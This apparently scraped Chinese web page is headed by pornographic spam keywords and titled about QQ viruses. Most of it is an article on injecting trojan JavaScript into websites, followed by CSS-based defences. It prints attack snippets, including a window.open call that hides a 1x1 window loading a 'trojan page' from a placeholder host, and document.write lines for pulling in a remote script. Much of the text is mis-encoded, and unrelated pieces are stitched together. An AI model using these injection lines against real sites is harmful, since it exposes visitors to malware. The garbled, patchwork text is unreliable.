亚洲精品中文字幕无乱码_久久亚洲精品无码AV大片_最新国产免费Av网址_国产精品3级片

網絡技術

qq中病毒了怎么辦

時間:2024-07-21 19:18:17 網絡技術 我要投稿
  • 相關推薦

qq中病毒了怎么辦

  最近不少用戶發(fā)現(xiàn)QQAccelex.exe病毒文件反復生成出現(xiàn)問題,不知道該怎么辦,強行關機等都沒有辦法有效的解決這個問題,小編給大家推薦一下解決這個問題的方法。

  在《電腦報》上看了不少高手教授的QQ防盜技巧,心癢不止,也冒昧來此獻丑!一些高手說的錯位法輸入密碼雖然具有防盜作用,但理論上黑客可以用窮舉法破解出密碼,所以這種方法不保險。

  QQ防盜的根本所在我認為是判斷出電腦中是否有偷號木馬,沒有木馬我們怎么輸入密碼都安全;如果有,再巧的密碼輸入法都不保險。那么如何既準確又快捷地判斷出電腦中有無QQ木馬呢?

  我用的方法是在QQ登錄界面的密碼處,點擊鼠標右鍵。如果電腦中沒有木馬,點擊鼠標右鍵后沒有任何反應;如果電腦中有木馬,點擊鼠標右鍵就會彈出右鍵菜單。因為很早QQ就不允許在密碼框中直接用“Ctrl+C”、 “Ctrl+V”輸入密碼了,如果這種輸入方式行得通,則表示有木馬破壞了QQ的規(guī)則。

  了解JS掛馬方式

  IFRAME掛馬方式比較早,相應的預防措施也比較多,其中用CSS配合JS腳本進行預防是主流方式。可這種預防方式也存在安全隱患,JS腳本也可以被用來掛馬,令人防不勝防。

  CSS掛馬

  許多人認為,只要自己的服務器安全做得足夠好,建站程序補丁打得勤快,就能夠抵御住所有黑客的攻擊。這樣做的人肯定是非常多的,可為什么還是有許多網站被黑呢?

  一個很重要的原因,就是他們過于相信從第三方網站中下載的整站程序,或者修改版的論壇程序等,而這些程序有些已經被黑客做過手腳,已經植入了后門,此時如果網站站長不熟悉如何查補漏洞,將無異于引狼入室。

  比較典型的一個例子是,曾經非常出名的《易想多用戶商城 v2.1》(仿淘寶版),被許多黑客竄改過,多個關鍵頁面被植入了后門,然后到處提供下載,導致了許多使用該程序的網站被攻擊。因此在隱蔽手段掛馬橫行的今天,熟悉并掌握隱蔽的掛馬方式,是一個安全工程師必備的技能。

  JS掛馬溯源

  古人云:人算不如天算,天算不如暗算(小編:哪個古人這樣云過?)。當IFRAME逐漸被黑客濫用的時候,有經驗的安全工程師也開始研究相應的對策,一段時間內各種阻止IFRAME掛馬的方法不斷涌現(xiàn),其中通用性較高的就是利用CSS配合JS腳本防御IFRAME掛馬。

  而黑客也發(fā)現(xiàn),很多網站都會讓網頁調用JS腳本來實現(xiàn)廣告等諸多特效,如果將木馬掛在JS腳本中,所有調用該JS腳本的網頁都等同于被掛上了木馬,對于需要肉雞群的黑客而言是一勞永逸,因此JS腳本掛馬逐漸開始被黑客應用。

  小百科:JS腳本是JavaScript腳本語言的簡稱,它是一種面向對象的腳本語言,目前廣泛用于動態(tài)網頁的編程。需要提示大家的是,JavaScript和Java除了語法上有一些相似之處,以及都能夠當作網頁的編程語言以外,兩者是完全不相干的。而JavaScript與Jscript也不同,Jscript是微軟為了迎戰(zhàn)JavaScript推出的腳本語言。

  雖然JavaScript作為給非程序人員的腳本語言向大眾推廣,但是JavaScript是一門具有豐富特性的語言,它有著和其他編程語言一樣的復雜性。實際上,你必須對JS有扎實的理解才能用它來編寫比較復雜的程序,作為一名安全工程師,掌握JS腳本在工作中會有很大的幫助。

  掛馬原理一點通

  JS腳本掛馬對于黑客而言,可以說優(yōu)點多得數(shù)不過來,首先JS腳本在掛馬時可以直接將JS代碼寫在網頁中,也可以通過注入網頁,讓網站遠程調取異地JS腳本。此外,JS掛馬插入Web頁面的方法有幾十種,絕對夠菜鳥們眼花繚亂,無從辨別木馬在何處。

  IFRAME掛馬相對于安全工程師而言,如同一個穿著鮮紅顏色外衣的劫匪,招搖而扎眼,很容易被發(fā)現(xiàn)。但是利用JS掛馬就意味著這個劫匪擁有了一張可以隨時變換的面孔,而且它還能夠隨時更換衣服。這樣的劫匪在安全工程師搜查時,很容易蒙混過關,導致木馬久殺不絕。

  JS掛馬攻防實錄

  攻現(xiàn)在最多見的JS掛馬方法有兩種,一種是直接將JavaScript腳本代碼寫在網頁中,當訪問者在瀏覽網頁時,惡意的掛馬腳本就會通過用戶的瀏覽器悄悄地打開網馬窗口,隱藏地運行(圖1),這種方法使用的關鍵代碼如下:

  window.open("http:///木.html","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1");

  這種代碼往往很長,很容易被安全工程師發(fā)現(xiàn),而且沒有經驗的黑客也喜歡將“width”和“height=”參數(shù)設為“0”,但是設置為0后,可能會出現(xiàn)惡意代碼不運行的情況。

  另外一種JS掛馬方式是,黑客先將掛馬腳本代碼“document.write('')”,寫入Windows中的寫字板另存為后綴為.js的腳本文件,并上傳到自己指定的網址。這時黑客只需要在受害者的網站中寫入:

  document.write("

  ")

  document.write("")

  document.write("

  ")

  就成功地將木馬掛到了對方的網頁中了。

  小提示:黑客還可以根據情況隨機變換插入的JS掛馬方法,例如黑客有可能會將腳本寫為:

  防第一種JS掛馬方式,不方便,用得非常少,而第二種JS掛馬方式才是當前主流的,所以我們主要針對它進行防御。方法就是阻止Src請求的異地外域的JS腳本,代碼如下:

  iframe{mdy1:expression(this.src='about:blank',this.outerHTML='');}

  script{mzm2:expression((this.src.toLowerCase().indexOf('http')==0)?document.write('木馬被成功隔離!'):'');}

  不過這種方法的缺點就是網站的訪問者將不能看到被掛了JS木馬的相關網頁(圖2)。

  所以我們?yōu)榘踩こ處熖峁┝艘欢慰梢灾兄笿S腳本運行的CSS代碼,這段代碼會讓異地外域的JS文件在使用document.write()時,被document.close()強制關閉。這個時侯JS掛馬的內容往往還沒有來得及寫完,只有部分被強制輸出了,Writer后面的內容再不會被寫入訪問者的電腦中,從而起到防范JS腳本掛馬的作用。

【qq中病毒了怎么辦】相關文章:

電腦病毒殺不掉怎么辦09-02

如何從Windows進程中判斷病毒和木馬08-09

操作系統(tǒng)中幾個容易被誤認為病毒的文件06-20

網頁中圖片無法顯示怎么辦09-29

常見的電腦病毒有哪些 電腦病毒種類有哪些08-29

php網頁病毒清除的方法11-04

在英語聽力中遇見生詞怎么辦10-29

行車中突遇強降雨該怎么辦09-26

破解電腦病毒的妙招10-22

怎么防止ARP病毒的攻擊08-07